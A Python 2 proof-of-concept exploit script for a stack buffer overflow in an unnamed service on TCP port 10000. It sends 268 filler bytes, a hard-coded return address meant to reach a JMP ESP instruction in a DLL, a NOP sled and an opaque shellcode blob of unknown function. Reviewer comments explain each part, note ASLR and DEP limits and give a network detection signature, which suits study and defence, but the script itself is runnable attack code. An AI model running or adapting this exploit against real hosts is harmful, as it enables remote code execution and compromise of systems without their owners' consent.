#!/usr/bin/python
import socket, sys
# Proof-of-concept for what appears to be a stack buffer overflow in a TCP
# service: it connects to the host named by the first command-line argument on
# port 10000, sends one oversized message and closes the connection.
# NOTE(review): the "\x.." escapes are concatenated into a str and passed to
# send(), which relies on Python 2 byte-string semantics.
# sys.argv[1] is read without a check, so a missing argument raises IndexError.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1],10000))
# 268 filler bytes ("A" = 0x41). Presumably this is the distance from the
# start of the overflowed buffer to the saved return address; the target
# service is not shown here, so confirm against it.
buffer = 268*"A"
# Four bytes that land where the saved return address is expected. They are
# written in little-endian order, i.e. the value 0x77D5AF0A.
# The address is hard-coded, so it is only valid while that module is loaded at
# the same base on the target. ASLR on the module invalidates it, and DEP/NX
# stops execution from the stack even if the jump succeeds.
buffer += "\x0A\xaf\xd5\x77" #EIP contains JMP ESP in some .DLL
# 25 bytes of 0x90 (the x86 NOP opcode) placed between the return address and
# the payload as padding.
# Detection: a long run of 0x41 followed by a run of 0x90 in traffic to this
# port is a conventional network-signature indicator for this class of input.
buffer += "\x90"*25
# Opaque machine-code blob appended as the payload. What it does cannot be
# determined from this listing and nothing here decodes it, so treat it as
# untrusted binary content.
buffer += ("\xba\xb3\xa7\x13\x0c\xda\xd3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x4b\x31\x56\x14\x03\x56\x14\x83\xee\xfc\x51\x52\xef\xe4\x1c"
"\x9d\x10\xf5\x7e\x17\xf5\xc4\xac\x43\x7d\x74\x60\x07\xd3\x75"
"\x0b\x45\xc0\x0e\x79\x42\xe7\xa7\x37\xb4\xc6\x38\xf6\x78\x84"
"\xfb\x99\x04\xd7\x2f\x79\x34\x18\x22\x78\x71\x45\xcd\x28\x2a"
"\x01\x7c\xdc\x5f\x57\xbd\xdd\x8f\xd3\xfd\xa5\xaa\x24\x89\x1f"
"\xb4\x74\x22\x14\xfe\x6c\x48\x72\xdf\x8d\x9d\x61\x23\xc7\xaa"
"\x51\xd7\xd6\x7a\xa8\x18\xe9\x42\x66\x27\xc5\x4e\x77\x6f\xe2"
"\xb0\x02\x9b\x10\x4c\x14\x58\x6a\x8a\x91\x7d\xcc\x59\x01\xa6"
"\xec\x8e\xd7\x2d\xe2\x7b\x9c\x6a\xe7\x7a\x71\x01\x13\xf6\x74"
"\xc6\x95\x4c\x52\xc2\xfe\x17\xfb\x53\x5b\xf9\x04\x83\x03\xa6"
"\xa0\xcf\xa6\xb3\xd2\x8d\xae\x70\xe8\x2d\x2f\x1f\x7b\x5d\x1d"
"\x80\xd7\xc9\x2d\x49\xf1\x0e\x51\x60\x45\x80\xac\x8b\xb5\x88"
"\x6a\xdf\xe5\xa2\x5b\x60\x6e\x33\x63\xb5\x20\x63\xcb\x66\x80"
"\xd3\xab\xd6\x68\x3e\x24\x08\x88\x41\xee\x21\x79\x65\x42\x26"
"\x7b\x99\x74\xea\xf2\x7f\x1c\x02\x52\xd7\x89\xe0\x81\xe0\x2e"
"\x1a\xe0\x5c\xe6\x8c\xbd\x8a\x30\xb2\x3e\x99\x12\x1f\x97\x4a"
"\xe1\x73\x2c\x6a\xf6\x59\x05\xfb\x61\x17\xc7\x4e\x13\x28\xc2"
"\x3b\xd3\xbc\xe8\xed\x84\x28\xf2\xc8\xe3\xf6\x0d\x3f\x78\x3e"
"\x9b\x80\x17\x3f\x4b\x01\xe8\x69\x01\x01\x80\xcd\x71\x52\xb5")
# The whole message goes out in a single send() call and the socket is closed
# without reading any reply.
sock.send(buffer)
sock.close()